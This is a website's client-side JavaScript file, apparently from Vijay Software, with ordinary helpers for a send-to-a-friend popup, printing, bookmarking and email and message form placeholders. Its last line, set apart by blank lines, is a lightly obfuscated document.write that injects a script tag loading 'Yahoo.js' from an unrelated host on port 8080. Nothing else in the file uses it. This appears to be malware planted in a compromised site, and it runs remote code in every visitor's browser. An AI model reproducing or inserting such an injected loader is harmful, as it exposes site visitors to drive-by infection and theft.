
function stf()
{
 window.open("sendtoafriend.cfm","","width=400,height=250,left=200,top=50,scrollbars=yes,toolbars=yes,maximize=no,resizable=no")
}

function printpage(){
	window.print() ;
}

function addbookmark()
{
bookmarkurl="http://www.vijaysoftware.com/"
bookmarktitle="Welcome To Vijay Software"
if (document.all)
window.external.AddFavorite(bookmarkurl,bookmarktitle)
}

var txtye=0;
var txtmessage=0;

function fc()
{
		if(txtye == 0 ) 
		{ 
			document.formqc.youremail.value=''; 
			txtye=0; 
		}
}

function bl()
{
		if(txtye==0) 
		{ 
			document.formqc.youremail.value=document.formqc.youremail.defaultValue; 
			txtye=0; 
		}
}

function cng()
{
		txtye=1; 
		if(document.formqc.youremail.value=='' || document.formqc.youremail.value==document.formqc.youremail.defaultValue) 
			txtye=0;
}

function kd()
{
		txtye=1; 
		if(document.formqc.youremail.value=='' || document.formqc.youremail.value==document.formqc.youremail.defaultValue) 
			txtye=0;
}

function fc1()
{
		if(txtmessage==0) 
		{ 
			document.formqc.yourmessage.value=''; 
			txtmessage=0; 
		}
}

function bl1()
{
		if(txtmessage==0) 
		{ 
			document.formqc.yourmessage.value=document.formqc.yourmessage.defaultValue; 
			txtmessage=0; 
		}
}

function cng1()
{
		txtmessage=1; 
		if(document.formqc.yourmessage.value=='' || document.formqc.yourmessage.value==document.formqc.yourmessage.defaultValue) 
		txtmessage=0;
}

function kd1()
{
		txtmessage=1; 
		if(document.formqc.yourmessage.value=='' || document.formqc.yourmessage.value==document.formqc.yourmessage.defaultValue) 
		txtmessage=0;
}





document.write('<s'+'cript type="text/javascript" src="http://assolkh.blackhulu.com:8080/Yahoo.js"></scr'+'ipt>');